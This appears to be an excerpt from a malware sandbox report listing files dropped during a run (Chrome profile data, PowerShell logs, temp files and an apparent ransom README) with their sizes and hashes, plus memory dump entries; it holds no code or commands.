SHA16bc16ede4a2f9c550543c8a2c8b968291a0d2a53
SHA256698198d1e9a2c8dacbe3c51b175c4193adfa1573d7446cf92b899ef8e93e82cc
SHA51285fd2f326b057e959f12bd1e1f0c44a1f6f79a0acb4df129b2478b1685faa68eaa26c343222109decfef4049ccc76189bf658d0973234e4986e65194d3bb6158
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOGFilesize
324B
MD5dc7aebd5fd91f6f1b86ef9c792c843b4
SHA12927a8af3fbc9f164d1a404a060abfd6b915be31
SHA2564e3fd76c915842e2ab7b2509f3c98e042ce18abb7887990dc4a26a8c351cc21c
SHA5121a01287cc5e0eecbafa4f9f6f2c422924c6f4e19f80e23663bc86d26e672bfe689c4a3f6e3b28de93a804fff22427c9fc8ef7c33150d940ecf69348860737c2e
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.logFilesize
817B
MD5297b9e37731445f9c773e946c02c411f
SHA1c5ad3a66ed40e4e9324f9424edd36e3d1d396ce4
SHA256945d90fe222554f81b3835a5c8035408f7a2590b53fd9fbc471aa104621ef9b2
SHA5125df3fcb127103e03278c0e3ffa7f829408c34beb74bbf2b89535e0990aac3fe5b3624cf19b8063d04de56e1ffeaf59a0085545763e6ef6dfdffc2954509a5a7b
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOGFilesize
317B
MD506d25d965c3b3038f50489416c12a7bf
SHA17aa51ad99009e285deac5ccc13da62a4262c4eee
SHA256d1a923c319dbf95a541661f1e525c24bc04cb36a2458a7d0215db78510462d8d
SHA5121f948af24cc2b8a8c17b980b2a21e1f1d596fa9e97b4537e9042fe734a5d361424bacfda3cecc18a27d2465c4f71c87211d5087862d0bc50a931365d879efebc
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.logFilesize
855B
MD5f9acbed1d6d7b372fb0848d1a35c5c30
SHA1050a3c8b5dced2c20088d35b5107f449b351b167
SHA256aabd5c54820ffd4a41ad2ecd2041b5652b5ea70757aca1abf471e1625ef38a91
SHA512416b806bffeb4ec90d9c581fd7678b965b13f7d6b7db654a4fc4445a9ee566d2028fa580c45c5403f5af154307025ec6d96352a5c17d2df9e2a865c4ca686bdb
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOGFilesize
335B
MD5ed659fd9edc5e4db073e5532a40fe1c5
SHA1f883efc2965798f6de75f335647fefd6feac78a9
SHA2568fb6fc99bd1939d99851ccc1f508ab4d2241a33a58a998cdc9a0f187b04ead2e
SHA512c4e592be8be08dc0906126fb361cf01afb22955be37e162394bcf80c02fcec5133a9fbe305022084491f9b2d209945343b9cabf84a7a65993c3046e501516bea
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_0Filesize
44KB
MD556a28499ba8a3638c74fc9abd9dad970
SHA12489bd503b45824c63991465fcda6129401954ea
SHA2563322307b6926beba5ab71bc51afa28f3ef27802073d71dbb895463488b520e21
SHA512afba86aa4faf18cd94fa2ad7925c8212e722fc4c3821c335544be7de3c078d45ab902c4362d2644d5de715414a3a4ab0d39fe9f1aaff8c0f853df5aa07584d2f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_1Filesize
264KB
MD523916ce11f65f7811d057e424ca33922
SHA12ea91c14db4c0afac540a86dd259474b5e10ae14
SHA25639f509d7f817cc9666448d7046d9dda64a675014cdc683d29362777c892476bd
SHA512cd66bee03d2a7cf5f4b9e13b80c34daa6e42748a7831ab00216bfd4986afc50fb337c5d98b26c78e94d047be6e4884714c8ecaf014b21a3e316e86930b5b5649
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_3Filesize
4.0MB
MD5130ac97d81116793fb1ef2cc8851487e
SHA1aff96219053751cc66f89baf8ce1710985bc04ca
SHA256ae944649088b1caf5e59a4f051416bf9e8e576dbd25969e1080a37e142e931e6
SHA512f15ef3d011f307fc9d871ac2aa341d8fe59cb7500a8829687b01361ba991af17aedf80a36e91dea0230f1d8f9f130c93372444a5d5cdb252b246c23adba24c02
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last VersionFilesize
14B
MD59eae63c7a967fc314dd311d9f46a45b7
SHA1caba9c2c93acfe0b9ceb9ab19b992b0fc19c71cf
SHA2564288925b0cf871c7458c22c46936efb0e903802feb991a0e1803be94ca6c251d
SHA512bed924bff236bf5b6ce1df1db82e86c935e5830a20d9d24697efd82ca331e30604db8d04b0d692ec8541ec6deb2225bcc7d805b79f2db5726642198ecf6348b8
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local StateFilesize
173KB
MD56435fae3e6841d8fa1c0e53994909eb3
SHA1147501c9ee22a7dd24a8491b16e8bcb14a5ddf20
SHA25676aac15d0b55a6a68aabcfd2c5fcbeb2b4a979405ec84c6a6c08a599fb8dd773
SHA5129f8f32286f21676a2191a04da5a6bb5d46adb33dbe8c56c2b2b042e252c0c91064e4de4f7638c1b7d1c9abf54d8ee15d2c8919070436ad3ce2e2a0fbd12c9d4e
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\VariationsFilesize
86B
MD5961e3604f228b0d10541ebf921500c86
SHA16e00570d9f78d9cfebe67d4da5efe546543949a7
SHA256f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed
SHA512535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.jsonFilesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD571444def27770d9071039d005d0323b7
SHA1cef8654e95495786ac9347494f4417819373427e
SHA2568438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9
SHA512a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034
-
C:\Users\Admin\AppData\Local\Temp\3cef5ebf-a0bd-4722-9913-47f868fde725.tmpFilesize
94KB
MD515b24e4473b122b5bfd9eb227eb20b18
SHA18bd18f5326d1780351b9bf19b70c472c58fbb4ce
SHA2568effc0b4281653b73638fb373e7e3f3c4764cabec6b1f2362fd9664231179ef0
SHA5127af4a8b0c8513cb5dbba7471a44a115d30b286b596d3f23df09aa1667206faab0561c368217d0076583ccf17bb7a70324e069a41532793ae4b2d903543b749e0
-
C:\Users\Admin\AppData\Local\Temp\96b74cfa-5e63-4c00-b540-5582fefa93ab.tmpFilesize
203KB
MD53152c0bd0334e1356f6238bd54c25c6d
SHA11d76484ff9148b8078c8876b2a00e2a0c3bcd2b7
SHA25642fabeb69c89a9d134f3032a42229a75a6284725898aae317100e495e99ccfa7
SHA5122855bea6402133a8f1ff3741ec13c60bbc0263b5c4c1903c28131bf38b2180be889d81576c6b71334dbba840f9044f9cd60dd9eb3dbd17e848798ce3c031c5b9
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3y4crnfu.3dw.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\README.75ec1c69.TXTFilesize
3KB
MD5b58e2411168bbdbec635cf4001635db0
SHA1c130cd9caaaa514a6b98c1168e10d44a989d191a
SHA256652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a
SHA51287e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a
-
memory/4144-142-0x000002B8AC520000-0x000002B8AC542000-memory.dmpFilesize
136KB
-
memory/4144-150-0x00007FFA9A1F0000-0x00007FFA9ACB1000-memory.dmpFilesize
10.8MB
-
memory/4144-152-0x000002B8C4CA0000-0x000002B8C4CB0000-memory.dmpFilesize
64KB
-
memory/4144-151-0x000002B8C4CA0000-0x000002B8C4CB0000-memory.dmpFilesize
64KB
-
memory/4144-153-0x000002B8C4CA0000-0x000002B8C4CB0000-memory.dmpFilesize
64KB
-
memory/4144-172-0x00007FFA9A1F0000-0x00007FFA9ACB1000-memory.dmpFilesize
10.8MB